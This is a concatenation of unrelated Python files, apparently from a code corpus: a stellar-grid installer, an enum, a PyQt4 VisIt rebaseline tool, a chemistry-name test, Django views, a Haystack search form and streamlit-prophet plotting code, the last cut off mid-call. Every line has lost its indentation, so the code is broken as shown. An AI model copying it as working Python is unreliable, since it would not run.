with open(os.path.join(path, 'eep_params.pkl'), 'wb') as f:
pickle.dump(eep_params, f)
print('Reading and combining grid files')
grids = all_from_dartmouth(raw_grids_path)
grids = from_pandas(grids, name=name)
# Save full grid to file
full_save_path = os.path.join(path, 'full_grid.pqt')
print(f'Saving to {full_save_path}')
grids.to_parquet(full_save_path)
print(f'Converting to eep-based tracks')
eeps = grids.to_eep(eep_params, eep_functions, metric_function)
# Save EEP grid to file
eep_save_path = os.path.join(path, 'eep_grid.pqt')
print(f'Saving to {eep_save_path}')
eeps.to_parquet(eep_save_path)
# Create and save interpolator to file
interp = eeps.to_interpolator()
interp_save_path = os.path.join(path, 'interpolator.pkl')
print(f'Saving interpolator to {interp_save_path}')
interp.to_pickle(path=interp_save_path)
print(f'Model grid "{name}" installed.')
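# Usage sketch (the path below is hypothetical):
#     install('/path/to/dartmouth/raw_grids', name='dartmouth')
# reads every *.trk file in the directory, then caches the full grid, the
# EEP-based grid, and a pickled interpolator under kiauhoku's grids directory.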
|
30226
|
from enum import Enum
class TradeStatus(Enum):
PENDING_ACCEPT = 0
PENDING_CONFIRM = 1
PENDING_CANCEL = 2
CANCELED = 3
CONFIRMED = 4
FAILED = 5
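# Illustrative lookups (standard Enum behaviour):
#     TradeStatus(3) is TradeStatus.CANCELED   -> True
#     TradeStatus.CONFIRMED.name               -> 'CONFIRMED'
#     TradeStatus.PENDING_ACCEPT.value         -> 0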
|
30238
|
import filecmp
import os
import sys
import shutil
import subprocess
import time
import unittest
if (sys.version_info > (3, 0)):
import urllib.request, urllib.parse, urllib.error
else:
import urllib
from optparse import OptionParser
from PyQt4 import QtCore,QtGui
parser = OptionParser()
parser.add_option("-r", "--root", dest="web_root",
default="http://portal.nersc.gov/project/visit/",
help="Root of web URL where baselines are")
parser.add_option("-d", "--date", dest="web_date",
help="Date of last good run, in YYMonDD form")
parser.add_option("-m", "--mode", dest="mode",
help="Mode to run in: serial, parallel, sr")
parser.add_option("-w", "--web-url", dest="web_url",
help="Manual URL specification; normally generated "
"automatically based on (-r, -d, -m)")
parser.add_option("-g", "--git", dest="git", action="store_true",
help="Use git to ignore images with local modifications")
parser.add_option("-s", "--svn", dest="svn", action="store_true",
help="Use svn to ignore images with local modifications")
(options, args) = parser.parse_args()
if options.web_url is not None:
uri = options.web_url
else:
uri = options.web_root + options.web_date + "/"
mode = ""
if options.mode == "sr" or options.mode == "scalable,parallel" or \
options.mode == "scalable_parallel":
mode="davinci_scalable_parallel_icet"
else:
mode="".join([ s for s in ("davinci_", options.mode) ])
uri += mode + "/"
parser.destroy()
print("uri:", uri)
class MW(QtGui.QMainWindow):
def __init__(self, parent=None):
QtGui.QMainWindow.__init__(self, parent)
def real_dirname(path):
"""Python's os.path.dirname is not dirname."""
return path.rsplit('/', 1)[0]
def real_basename(path):
"""Python's os.path.basename is not basename."""
    if path.rsplit('/', 1)[1] == '': return None
return path.rsplit('/', 1)[1]
def baseline_current(serial_baseline):
"""Given the path to the serial baseline image, determine if there is a mode
specific baseline. Return a 2-tuple of the baseline image and the path to
the 'current' image."""
dname = real_dirname(serial_baseline)
bname = real_basename(serial_baseline)
baseline = serial_baseline
if options.mode is not None:
# Check for a mode specific baseline.
mode_spec = os.path.join(dname + "/", options.mode + "/", bname)
if os.path.exists(mode_spec):
baseline = mode_spec
# `Current' image never has a mode-specific path; filename/dir is always
# based on the serial baseline's directory.
no_baseline = serial_baseline.split('/', 1) # path without "baseline/"
current = os.path.join("current/", no_baseline[1])
return (baseline, current)
def mode_specific(baseline):
"""Given a baseline image path, return a path to the mode specific baseline,
even if said baseline does not exist (yet)."""
if options.mode is None or options.mode == "serial":
return baseline
dname = real_dirname(baseline)
bname = real_basename(baseline)
if options.mode == "parallel":
if baseline.find("/parallel") != -1:
# It's already got parallel in the path; this IS a mode specific
# baseline.
return baseline
return os.path.join(dname, options.mode, bname)
if options.mode.find("scalable") != -1:
if baseline.find("scalable_parallel") != -1:
# Already is mode-specific.
return baseline
return os.path.join(dname, "scalable_parallel", bname)
# Ruh roh. options.mode must be garbage.
raise NotImplementedError("Unknown mode '%s'" % options.mode)
def local_modifications_git(file):
vcs_diff = subprocess.call(["git", "diff", "--quiet", file])
if vcs_diff == 1:
return True
return False
def local_modifications_svn(file):
svnstat = subprocess.Popen("svn stat %s" % file, shell=True,
stdout=subprocess.PIPE)
diff = svnstat.communicate()[0]
if diff != '':
return True
return False
def local_modifications(filepath):
"""Returns true if the file has local modifications. Always false if the
user did not supply the appropriate VCS option."""
if options.git: return local_modifications_git(filepath)
if options.svn: return local_modifications_svn(filepath)
return False
def equivalent(baseline, image):
"""True if the files are the same."""
if not os.path.exists(image): return False
# Note this is `shallow' by default, but that's fine for our usage.
return filecmp.cmp(baseline, image)
def trivial_pass(baseline, image):
"""True if we can determine that this image is OK without querying the
network."""
return equivalent(baseline, image) or local_modifications(baseline)
class RebaselinePTests(unittest.TestCase):
def test_dirname(self):
input_and_results = [
("baseline/category/test/a.png", "baseline/category/test"),
("b/c/t/q.png", "b/c/t"),
("b/c/t/longfn.png", "b/c/t"),
("b/c/t/", "b/c/t")
]
for tst in input_and_results:
self.assertEqual(real_dirname(tst[0]), tst[1])
def test_basename(self):
input_and_results = [
("baseline/category/test/a.png", "a.png"),
("b/c/t/q.png", "q.png"),
("b/c/t/longfn.png", "longfn.png"),
("b/c/t/", None)
]
for tst in input_and_results:
self.assertEqual(real_basename(tst[0]), tst[1])
class Image(QtGui.QWidget):
def __init__(self, path, parent=None):
self._filename = path
self._parent = parent
self._display = QtGui.QLabel(self._parent)
self._load()
def _load(self):
pixmap = QtGui.QPixmap(300,300)
pixmap.load(self._filename)
self._display.resize(pixmap.size())
self._display.setPixmap(pixmap)
def widget(self): return self._display
def width(self): return self._display.width()
def height(self): return self._display.height()
def update(self, path):
self._filename = path
self._load()
class Layout(QtGui.QWidget):
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self._mainwin = parent
self._mainwin.statusBar().insertPermanentWidget(0,QtGui.QLabel())
self.status("Initializing...")
quit = QtGui.QPushButton('Quit', self)
quit.setMaximumWidth(80)
if parent is None: parent = self
parent.connect(quit, QtCore.SIGNAL('clicked()'), QtGui.qApp,
QtCore.SLOT('quit()'))
parent.connect(self, QtCore.SIGNAL('closeApp()'), self._die)
self._init_signals()
self._bugs = [] # list which keeps track of which images we think are bugs.
# guess an initial size; we don't know a real size until we've downloaded
# images.
self.resize_this_and_mainwin(600, 600)
self.setFocusPolicy(QtCore.Qt.StrongFocus)
self.setFocus()
self._baseline = None
self._current = None
self._diff = None
self._images = [None, None, None]
self._next_set_of_images()
self._images[0] = Image(self._baseline, self)
self._images[1] = Image(self._current, self)
self._images[2] = Image(self._diff, self)
grid = QtGui.QGridLayout()
label_baseline = QtGui.QLabel(grid.widget())
label_current = QtGui.QLabel(grid.widget())
label_diff = QtGui.QLabel(grid.widget())
label_baseline.setText("Baseline image:")
label_current.setText("Davinci's current:")
label_diff.setText("difference between them:")
label_baseline.setMaximumSize(QtCore.QSize(160,35))
label_current.setMaximumSize(QtCore.QSize(160,35))
label_diff.setMaximumSize(QtCore.QSize(200,35))
label_directions = QtGui.QLabel(grid.widget())
        label_directions.setText("Keyboard shortcuts:\n\n"
"y: yes, rebaseline\n"
"n: no, current image is wrong\n"
"u: unknown, I can't/don't want to decide now\n"
"q: quit")
label_directions.setMaximumSize(QtCore.QSize(300,300))
grid.addWidget(label_baseline, 0,0)
grid.addWidget(label_current, 0,1)
grid.addWidget(self._images[0].widget(), 1,0)
grid.addWidget(self._images[1].widget(), 1,1)
grid.addWidget(label_diff, 2,0)
grid.addWidget(quit, 2,1)
grid.addWidget(self._images[2].widget(), 3,0)
grid.addWidget(label_directions, 3,1)
rows = (
(0, (label_baseline, label_current)),
(1, (self._images[0], self._images[1])),
(2, (label_diff, quit)),
(3, (self._images[2], label_directions))
)
cols = (
(0, (label_baseline, self._images[0], label_diff, self._images[2])),
(1, (label_current, self._images[1], quit, label_directions))
)
for r in rows:
grid.setRowMinimumHeight(r[0], max([x.height() for x in r[1]]))
for c in cols:
grid.setColumnMinimumWidth(c[0], max([x.height() for x in c[1]]))
self.setLayout(grid)
self.resize_this_and_mainwin(self.calc_width(), self.calc_height())
self.show()
self.setFocus()
def resize_this_and_mainwin(self, w, h):
self.resize(w,h)
# make sure it can't shrink too much
self._mainwin.setMinimumWidth(w)
self._mainwin.setMinimumHeight(h+30) # +30: for the status bar
# try not to resize the mainwin if we don't need to; it's annoying.
cur_w = self._mainwin.width()
cur_h = self._mainwin.height()
self._mainwin.resize(max(w,cur_w), max(h,cur_h))
self._mainwin.update()
def _die(self):
print("You thought these test results were bugs:")
for f in self._bugs:
print("\t", f)
self._mainwin.close()
def calc_width(self):
w = 0
for col in range(0,self.layout().columnCount()):
w += self.layout().columnMinimumWidth(col)
return w
def calc_height(self):
h = 0
for row in range(0,self.layout().rowCount()):
h += self.layout().rowMinimumHeight(row)
return h
def _update_images(self):
self._images[0].update(self._baseline)
self._images[1].update(self._current)
self._images[2].update(self._diff)
self.resize_this_and_mainwin(self.calc_width(), self.calc_height())
self.update()
def _rebaseline(self):
self.status("".join(["rebaselining ", self._current, "..."]))
baseline = mode_specific(self._baseline)
print("moving", self._current, "on top of", baseline)
# We might be creating the first mode specific baseline for that test. If
# so, it'll be missing the baseline specific dir.
if not os.path.exists(real_dirname(baseline)):
print(real_dirname(baseline), "does not exist, creating...")
os.mkdir(real_dirname(baseline))
shutil.move(self._current, baseline) # do the rebaseline!
self._next_set_of_images()
self._update_images()
def _ignore(self):
self.status("".join(["ignoring ", self._baseline, "..."]))
self._bugs.append(self._baseline)
self._next_set_of_images()
self._update_images()
def _unknown(self):
self.status("".join(["unknown ", self._baseline, "..."]))
self._next_set_of_images()
self._update_images()
def status(self, msg):
self._mainwin.statusBar().showMessage(msg)
self._mainwin.statusBar().update()
QtCore.QCoreApplication.processEvents() # we're single threaded
def _next_set_of_images(self):
"""Figures out the next set of images to display. Downloads 'current' and
'diff' results from davinci. Sets filenames corresponding to baseline,
current and diff images."""
if self._baseline is None: # first call, build list.
self._imagelist = []
print("Building initial file list... please wait.")
self.status("Building initial file list... please wait.")
for root, dirs, files in os.walk("baseline"):
for f in files:
fn, ext = os.path.splitext(f)
if ext == ".png":
# In some cases, we can trivially reject a file. Don't bother
# adding it to our list in that case.
serial_baseline_fn = os.path.join(root, f)
# Does this path contain "parallel" or "scalable_parallel"? Then
# we've got a mode specific baseline. We'll handle those based on
# the serial filenames, so ignore them for now.
if serial_baseline_fn.find("parallel") != -1: continue
baseline_fn, current_fn = baseline_current(serial_baseline_fn)
assert os.path.exists(baseline_fn)
if not trivial_pass(baseline_fn, current_fn):
self._imagelist.append(baseline_fn)
try:
while len(self._imagelist) > 0:
self._baseline = self._imagelist.pop()
# now derive other filenames based on that one.
filename = None
# os.path.split fails if there's no /
try:
filename = os.path.split(self._baseline)
filename = filename[1]
except AttributeError as e:
self.status("No slash!")
break
current_url = uri + "/c_" + filename
if (sys.version_info > (3, 0)):
f,info = urllib.request.urlretrieve(current_url, "local_current.png")
else:
f,info = urllib.urlretrieve(current_url, "local_current.png")
self.status("".join(["Checking ", current_url, "..."]))
if info.getheader("Content-Type").startswith("text/html"):
# then it's a 404 or other error; skip this image.
continue
else:
# We found the next image.
self._current = "local_current.png"
diff_url = uri + "/d_" + filename
if (sys.version_info > (3, 0)):
f,info = urllib.request.urlretrieve(diff_url, "local_diff.png")
else:
f,info = urllib.urlretrieve(diff_url, "local_diff.png")
if info.getheader("Content-Type").startswith("text/html"):
raise Exception("Could not download diff image.")
self._diff = "local_diff.png"
self.status("Waiting for input on " + filename)
break
except KeyError as e:
print(e)
print("No more images!")
self.emit(QtCore.SIGNAL('closeApp()'))
def _init_signals(self):
self.connect(self, QtCore.SIGNAL('rebaseline()'), self._rebaseline)
self.connect(self, QtCore.SIGNAL('ignore()'), self._ignore)
self.connect(self, QtCore.SIGNAL('unknown()'), self._unknown)
def keyPressEvent(self, event):
if event.key() == QtCore.Qt.Key_Q:
self.emit(QtCore.SIGNAL('closeApp()'))
if event.key() == QtCore.Qt.Key_Y:
self.emit(QtCore.SIGNAL('rebaseline()'))
if event.key() == QtCore.Qt.Key_N:
self.emit(QtCore.SIGNAL('ignore()'))
if event.key() == QtCore.Qt.Key_U:
self.emit(QtCore.SIGNAL('unknown()'))
QtCore.QCoreApplication.processEvents()
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(RebaselinePTests)
results = unittest.TextTestRunner(verbosity=2).run(suite)
if not results.wasSuccessful():
print("Tests failed, bailing.")
sys.exit(1)
app = QtGui.QApplication(sys.argv)
mw = MW()
mw.show()
mw.setWindowTitle("visit rebaseline -p")
layout = Layout(mw)
layout.show()
sys.exit(app.exec_())
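# Typical invocation (illustrative; the script name is hypothetical, the flags
# come from the OptionParser above):
#     python rebaseline_p.py -d 23Jan05 -m serial -g
# compares local baselines against davinci's posted results and lets you accept
# (y), reject (n), or defer (u) each differing image.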
|
30257
|
from pyssian.chemistryutils import is_basis,is_method
import unittest
class ChemistryUtilsTest(unittest.TestCase):
def setUp(self):
self.Valid_Basis = '6-311+g(d,p) 6-31g* cc-pVTZ D95V* LanL2DZ SDD28 Def2SVP UGBS2P2++'.split()
self.Fake_Basis = '6-311g+(d,p) 6-31*g ccpVTZ D96V* LanL2TZ SDD Def2SP UGBS2++P2'.split()
self.Valid_Methods = 'ub3lyp mp2 casscf ccsd(t) rm062x WB97XD pbepbe'.split()
self.Fake_Methods = 'bu3lyp pm2 bw97xd m06-2x pbepbe0'.split()
self.Usual_Keywords = 'opt freq scrf scf #p calcfc empiricaldispersion'.split()
def test_valid_isbasis(self):
msg = 'Valid basis not properly recognized'
for valid in self.Valid_Basis:
self.assertTrue(is_basis(valid),msg)
def test_fake_isbasis(self):
msg = 'Fake basis recognized as valid'
for fake in self.Fake_Basis:
self.assertFalse(is_basis(fake),msg)
def test_valid_ismethod(self):
msg = 'Valid method not properly recognized'
for valid in self.Valid_Methods:
self.assertTrue(is_method(valid),msg)
def test_fake_ismethod(self):
msg = 'Fake method recognized as valid'
for fake in self.Fake_Methods:
self.assertFalse(is_method(fake),msg)
def test_usual_keywords(self):
msg1 = 'Keyword recognized as basis'
msg2 = 'Keyword recognized as method'
for keyword in self.Usual_Keywords:
self.assertFalse(is_basis(keyword),msg1)
self.assertFalse(is_method(keyword),msg2)
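# Allow running this test module directly (a convenience addition; assumes the
# standard unittest runner is acceptable):
if __name__ == '__main__':
    unittest.main()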
|
30267
|
import logging
from django.apps import apps
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import Http404, HttpResponse, JsonResponse
from django.views.generic import TemplateView, View
from zentral.core.stores import frontend_store
logger = logging.getLogger("server.base.views")
class HealthCheckView(View):
def get(self, request, *args, **kwargs):
return HttpResponse('OK')
class IndexView(LoginRequiredMixin, TemplateView):
template_name = "base/index.html"
def get_context_data(self, **kwargs):
context = super(IndexView, self).get_context_data(**kwargs)
app_list = []
for app_name, app_config in apps.app_configs.items():
if getattr(app_config, "events_module", None) is not None:
app_list.append(app_name)
app_list.sort()
context["apps"] = app_list
return context
class AppHistogramDataView(LoginRequiredMixin, View):
INTERVAL_DATE_FORMAT = {
"hour": "%H:%M",
"day": "%d/%m",
"week": "%d/%m",
"month": "%m/%y",
}
def get(self, request, *args, **kwargs):
app = kwargs['app']
try:
zentral_app = apps.app_configs[app]
search_dict = getattr(zentral_app.events_module, "ALL_EVENTS_SEARCH_DICT")
except (KeyError, AttributeError):
raise Http404
interval = kwargs["interval"]
try:
date_format = self.INTERVAL_DATE_FORMAT[interval]
except KeyError:
raise Http404
labels = []
event_count_data = []
unique_msn_data = []
for dt, event_count, unique_msn in frontend_store.get_app_hist_data(interval, int(kwargs["bucket_number"]),
**search_dict):
labels.append(dt.strftime(date_format))
event_count_data.append(event_count)
unique_msn_data.append(unique_msn)
datasets = {"event_count": {
"label": "{} events".format(app),
"backgroundColor": "rgba(122, 182, 160, 0.7)",
"data": event_count_data
},
"unique_msn": {
"label": "{} machines".format(app),
"backgroundColor": "rgba(225, 100, 86, 0.7)",
"data": unique_msn_data
}}
return JsonResponse({"app": app,
"labels": labels,
"datasets": datasets})
|
30280
|
from haystack.forms import FacetedSearchForm
from haystack.query import SQ
from django import forms
from hs_core.discovery_parser import ParseSQ, MatchingBracketsNotFoundError, \
FieldNotRecognizedError, InequalityNotAllowedError, MalformedDateError
FACETS_TO_SHOW = ['creator', 'contributor', 'owner', 'content_type', 'subject', 'availability']
class DiscoveryForm(FacetedSearchForm):
SORT_ORDER_VALUES = ('title', 'author', 'created', 'modified')
SORT_ORDER_CHOICES = (('title', 'Title'),
('author', 'First Author'),
('created', 'Date Created'),
('modified', 'Last Modified'))
SORT_DIRECTION_VALUES = ('', '-')
SORT_DIRECTION_CHOICES = (('', 'Ascending'),
('-', 'Descending'))
NElat = forms.CharField(widget=forms.HiddenInput(), required=False)
NElng = forms.CharField(widget=forms.HiddenInput(), required=False)
SWlat = forms.CharField(widget=forms.HiddenInput(), required=False)
SWlng = forms.CharField(widget=forms.HiddenInput(), required=False)
start_date = forms.DateField(label='From Date', required=False)
end_date = forms.DateField(label='To Date', required=False)
coverage_type = forms.CharField(widget=forms.HiddenInput(), required=False)
sort_order = forms.CharField(label='Sort By:',
widget=forms.Select(choices=SORT_ORDER_CHOICES),
required=False)
sort_direction = forms.CharField(label='Sort Direction:',
widget=forms.Select(choices=SORT_DIRECTION_CHOICES),
required=False)
def search(self):
self.parse_error = None # error return from parser
sqs = self.searchqueryset.all().filter(replaced=False)
if self.cleaned_data.get('q'):
            # The prior code corrected for a failed match of complete words, as documented
# in issue #2308. This version instead uses an advanced query syntax in which
# "word" indicates an exact match and the bare word indicates a stemmed match.
cdata = self.cleaned_data.get('q')
try:
parser = ParseSQ()
parsed = parser.parse(cdata)
sqs = sqs.filter(parsed)
except ValueError as e:
sqs = self.searchqueryset.none()
self.parse_error = "Value error: {}. No matches. Please try again".format(e.value)
return sqs
except MatchingBracketsNotFoundError as e:
sqs = self.searchqueryset.none()
self.parse_error = "{} No matches. Please try again.".format(e.value)
return sqs
except MalformedDateError as e:
sqs = self.searchqueryset.none()
self.parse_error = "{} No matches. Please try again.".format(e.value)
return sqs
except FieldNotRecognizedError as e:
sqs = self.searchqueryset.none()
self.parse_error = \
("{} Field delimiters include title, contributor, subject, etc. " +
"Please try again.")\
.format(e.value)
return sqs
except InequalityNotAllowedError as e:
sqs = self.searchqueryset.none()
self.parse_error = "{} No matches. Please try again.".format(e.value)
return sqs
geo_sq = None
if self.cleaned_data['NElng'] and self.cleaned_data['SWlng']:
if float(self.cleaned_data['NElng']) > float(self.cleaned_data['SWlng']):
geo_sq = SQ(east__lte=float(self.cleaned_data['NElng']))
geo_sq.add(SQ(east__gte=float(self.cleaned_data['SWlng'])), SQ.AND)
else:
geo_sq = SQ(east__gte=float(self.cleaned_data['SWlng']))
geo_sq.add(SQ(east__lte=float(180)), SQ.OR)
geo_sq.add(SQ(east__lte=float(self.cleaned_data['NElng'])), SQ.AND)
geo_sq.add(SQ(east__gte=float(-180)), SQ.AND)
if self.cleaned_data['NElat'] and self.cleaned_data['SWlat']:
# latitude might be specified without longitude
if geo_sq is None:
geo_sq = SQ(north__lte=float(self.cleaned_data['NElat']))
else:
geo_sq.add(SQ(north__lte=float(self.cleaned_data['NElat'])), SQ.AND)
geo_sq.add(SQ(north__gte=float(self.cleaned_data['SWlat'])), SQ.AND)
if geo_sq is not None:
sqs = sqs.filter(geo_sq)
# Check to see if a start_date was chosen.
start_date = self.cleaned_data['start_date']
end_date = self.cleaned_data['end_date']
# allow overlapping ranges
# cs < s < ce OR s < cs => s < ce
# AND
# cs < e < ce OR e > ce => cs < e
if start_date and end_date:
sqs = sqs.filter(SQ(end_date__gte=start_date) &
SQ(start_date__lte=end_date))
elif start_date:
sqs = sqs.filter(SQ(end_date__gte=start_date))
elif end_date:
sqs = sqs.filter(SQ(start_date__lte=end_date))
if self.cleaned_data['coverage_type']:
sqs = sqs.filter(coverage_types__in=[self.cleaned_data['coverage_type']])
creator_sq = None
contributor_sq = None
owner_sq = None
subject_sq = None
content_type_sq = None
availability_sq = None
# We need to process each facet to ensure that the field name and the
# value are quoted correctly and separately:
for facet in self.selected_facets:
if ":" not in facet:
continue
field, value = facet.split(":", 1)
value = sqs.query.clean(value)
if value:
if "creator" in field:
if creator_sq is None:
creator_sq = SQ(creator__exact=value)
else:
creator_sq.add(SQ(creator__exact=value), SQ.OR)
if "contributor" in field:
if contributor_sq is None:
contributor_sq = SQ(contributor__exact=value)
else:
contributor_sq.add(SQ(contributor__exact=value), SQ.OR)
elif "owner" in field:
if owner_sq is None:
owner_sq = SQ(owner__exact=value)
else:
owner_sq.add(SQ(owner__exact=value), SQ.OR)
elif "subject" in field:
if subject_sq is None:
subject_sq = SQ(subject__exact=value)
else:
subject_sq.add(SQ(subject__exact=value), SQ.OR)
elif "content_type" in field:
if content_type_sq is None:
content_type_sq = SQ(content_type__exact=value)
else:
content_type_sq.add(SQ(content_type__exact=value), SQ.OR)
elif "availability" in field:
if availability_sq is None:
availability_sq = SQ(availability__exact=value)
else:
availability_sq.add(SQ(availability__exact=value), SQ.OR)
else:
continue
if creator_sq is not None:
sqs = sqs.filter(creator_sq)
if contributor_sq is not None:
sqs = sqs.filter(contributor_sq)
if owner_sq is not None:
sqs = sqs.filter(owner_sq)
if subject_sq is not None:
sqs = sqs.filter(subject_sq)
if content_type_sq is not None:
sqs = sqs.filter(content_type_sq)
if availability_sq is not None:
sqs = sqs.filter(availability_sq)
return sqs
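# ---------------------------------------------------------------------------
# Minimal sketch (illustrative only, not part of the form above) of how the
# selected facets combine, assuming Haystack's SQ nodes: values chosen for the
# same field are OR'ed together, and each field's group is then AND'ed onto the
# SearchQuerySet by a separate .filter() call. The example values are made up.
#
#   creator_sq = SQ(creator__exact="alice")
#   creator_sq.add(SQ(creator__exact="bob"), SQ.OR)   # creator: alice OR bob
#   subject_sq = SQ(subject__exact="hydrology")
#   sqs = sqs.filter(creator_sq).filter(subject_sq)
#   # => (creator:alice OR creator:bob) AND subject:hydrology
# ---------------------------------------------------------------------------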
|
30281
|
from typing import Any, Dict, List
import datetime
import pandas as pd
import plotly.express as px
import plotly.figure_factory as ff
import plotly.graph_objects as go
import streamlit as st
from fbprophet import Prophet
from fbprophet.plot import plot_plotly
from plotly.subplots import make_subplots
from streamlit_prophet.lib.evaluation.metrics import get_perf_metrics
from streamlit_prophet.lib.evaluation.preparation import get_evaluation_df
from streamlit_prophet.lib.exposition.expanders import (
display_expander,
display_expanders_performance,
)
from streamlit_prophet.lib.exposition.preparation import get_forecast_components, prepare_waterfall
from streamlit_prophet.lib.inputs.dates import input_waterfall_dates
from streamlit_prophet.lib.utils.misc import reverse_list
def plot_overview(
make_future_forecast: bool,
use_cv: bool,
models: Dict[Any, Any],
forecasts: Dict[Any, Any],
target_col: str,
cleaning: Dict[Any, Any],
readme: Dict[Any, Any],
report: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
"""Plots a graph with predictions and actual values, with explanations.
Parameters
----------
make_future_forecast : bool
Whether or not a forecast is made on future dates.
use_cv : bool
Whether or not cross-validation is used.
models : Dict
Dictionary containing a model fitted on evaluation data and another model fitted on the whole dataset.
forecasts : Dict
Dictionary containing evaluation forecasts and future forecasts if a future forecast is made.
target_col : str
Name of target column.
cleaning : Dict
Cleaning specifications.
readme : Dict
Dictionary containing explanations about the graph.
report: List[Dict[str, Any]]
List of all report components.
"""
display_expander(readme, "overview", "More info on this plot")
    bool_param = not cleaning["log_transform"]
if make_future_forecast:
model = models["future"]
forecast = forecasts["future"]
elif use_cv:
model = models["eval"]
forecast = forecasts["cv_with_hist"]
else:
model = models["eval"]
forecast = forecasts["eval"]
fig = plot_plotly(
model,
forecast,
ylabel=target_col,
changepoints=bool_param,
trend=bool_param,
uncertainty=bool_param,
)
st.plotly_chart(fig)
report.append({"object": fig, "name": "overview", "type": "plot"})
return report
def plot_performance(
use_cv: bool,
target_col: str,
datasets: Dict[Any, Any],
forecasts: Dict[Any, Any],
dates: Dict[Any, Any],
eval: Dict[Any, Any],
resampling: Dict[Any, Any],
config: Dict[Any, Any],
readme: Dict[Any, Any],
report: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
"""Plots several graphs showing model performance, with explanations.
Parameters
----------
use_cv : bool
Whether or not cross-validation is used.
target_col : str
Name of target column.
datasets : Dict
Dictionary containing evaluation dataset.
forecasts : Dict
Dictionary containing evaluation forecasts.
dates : Dict
Dictionary containing evaluation dates.
eval : Dict
Evaluation specifications (metrics, evaluation set, granularity).
resampling : Dict
Resampling specifications (granularity, dataset frequency).
config : Dict
Cleaning specifications.
readme : Dict
Dictionary containing explanations about the graphs.
report: List[Dict[str, Any]]
List of all report components.
"""
style = config["style"]
evaluation_df = get_evaluation_df(datasets, forecasts, dates, eval, use_cv)
metrics_df, metrics_dict = get_perf_metrics(
evaluation_df, eval, dates, resampling, use_cv, config
)
st.write("## Performance metrics")
display_expanders_performance(use_cv, dates, resampling, style, readme)
display_expander(readme, "helper_metrics", "How to evaluate my model?", True)
st.write("### Global performance")
report = display_global_metrics(evaluation_df, eval, dates, resampling, use_cv, config, report)
st.write("### Deep dive")
report = plot_detailed_metrics(metrics_df, metrics_dict, eval, use_cv, style, report)
st.write("## Error analysis")
display_expander(readme, "helper_errors", "How to troubleshoot forecasting errors?", True)
fig1 = plot_forecasts_vs_truth(evaluation_df, target_col, use_cv, style)
fig2 = plot_truth_vs_actual_scatter(evaluation_df, use_cv, style)
fig3 = plot_residuals_distrib(evaluation_df, use_cv, style)
st.plotly_chart(fig1)
st.plotly_chart(fig2)
st.plotly_chart(fig3)
report.append({"object": fig1, "name": "eval_forecast_vs_truth_line", "type": "plot"})
report.append({"object": fig2, "name": "eval_forecast_vs_truth_scatter", "type": "plot"})
report.append({"object": fig3, "name": "eval_residuals_distribution", "type": "plot"})
report.append({"object": evaluation_df, "name": "eval_data", "type": "dataset"})
report.append(
{"object": metrics_df.reset_index(), "name": "eval_detailed_performance", "type": "dataset"}
)
return report
def plot_components(
use_cv: bool,
make_future_forecast: bool,
target_col: str,
models: Dict[Any, Any],
forecasts: Dict[Any, Any],
cleaning: Dict[Any, Any],
resampling: Dict[Any, Any],
config: Dict[Any, Any],
readme: Dict[Any, Any],
df: pd.DataFrame,
report: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
"""Plots a graph showing the different components of prediction, with explanations.
Parameters
----------
use_cv : bool
Whether or not cross-validation is used.
make_future_forecast : bool
Whether or not a future forecast is made.
target_col : str
Name of target column.
models : Dict
Dictionary containing a model fitted on evaluation data.
forecasts : Dict
Dictionary containing evaluation forecasts.
cleaning : Dict
Cleaning specifications.
resampling : Dict
Resampling specifications (granularity, dataset frequency).
config : Dict
Cleaning specifications.
readme : Dict
Dictionary containing explanations about the graph.
df: pd.DataFrame
Dataframe containing the ground truth.
report: List[Dict[str, Any]]
List of all report components.
"""
style = config["style"]
st.write("## Global impact")
display_expander(readme, "components", "More info on this plot")
if make_future_forecast:
forecast_df = forecasts["future"].copy()
model = models["future"]
elif use_cv:
forecast_df = forecasts["cv_with_hist"].copy()
forecast_df = forecast_df.loc[forecast_df["ds"] < forecasts["cv"].ds.min()]
model = models["eval"]
else:
forecast_df = forecasts["eval"].copy()
model = models["eval"]
fig1 = make_separate_components_plot(
model, forecast_df, target_col, cleaning, resampling, style
)
st.plotly_chart(fig1)
st.write("## Local impact")
display_expander(readme, "waterfall", "More info on this plot", True)
start_date, end_date = input_waterfall_dates(forecast_df, resampling)
fig2 = make_waterfall_components_plot(
model, forecast_df, start_date, end_date, target_col, cleaning, resampling, style, df
)
st.plotly_chart(fig2)
report.append({"object": fig1, "name": "global_components", "type": "plot"})
report.append({"object": fig2, "name": "local_components", "type": "plot"})
report.append({"object": df, "name": "model_input_data", "type": "dataset"})
return report
def plot_future(
models: Dict[Any, Any],
forecasts: Dict[Any, Any],
dates: Dict[Any, Any],
target_col: str,
cleaning: Dict[Any, Any],
readme: Dict[Any, Any],
report: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
"""Plots a graph with predictions for future dates, with explanations.
Parameters
----------
models : Dict
Dictionary containing a model fitted on the whole dataset.
forecasts : Dict
Dictionary containing future forecast.
dates : Dict
Dictionary containing future forecast dates.
target_col : str
Name of target column.
cleaning : Dict
Cleaning specifications.
readme : Dict
Dictionary containing explanations about the graph.
report: List[Dict[str, Any]]
List of all report components.
"""
display_expander(readme, "future", "More info on this plot")
    bool_param = not cleaning["log_transform"]
fig = plot_plotly(
models["future"],
forecasts["future"],
ylabel=target_col,
changepoints=bool_param,
trend=bool_param,
uncertainty=bool_param,
)
fig.update_layout(xaxis_range=[dates["forecast_start_date"], dates["forecast_end_date"]])
st.plotly_chart(fig)
report.append({"object": fig, "name": "future_forecast", "type": "plot"})
report.append({"object": forecasts["future"], "name": "future_forecast", "type": "dataset"})
return report
def plot_forecasts_vs_truth(
eval_df: pd.DataFrame, target_col: str, use_cv: bool, style: Dict[Any, Any]
) -> go.Figure:
"""Creates a plotly line plot showing forecasts and actual values on evaluation period.
Parameters
----------
eval_df : pd.DataFrame
Evaluation dataframe.
target_col : str
Name of target column.
use_cv : bool
Whether or not cross-validation is used.
style : Dict
Style specifications for the graph (colors).
Returns
-------
go.Figure
Plotly line plot showing forecasts and actual values on evaluation period.
"""
if use_cv:
colors = reverse_list(style["colors"], eval_df["Fold"].nunique())
fig = px.line(
eval_df,
x="ds",
y="forecast",
color="Fold",
color_discrete_sequence=colors,
)
fig.add_trace(
go.Scatter(
x=eval_df["ds"],
y=eval_df["truth"],
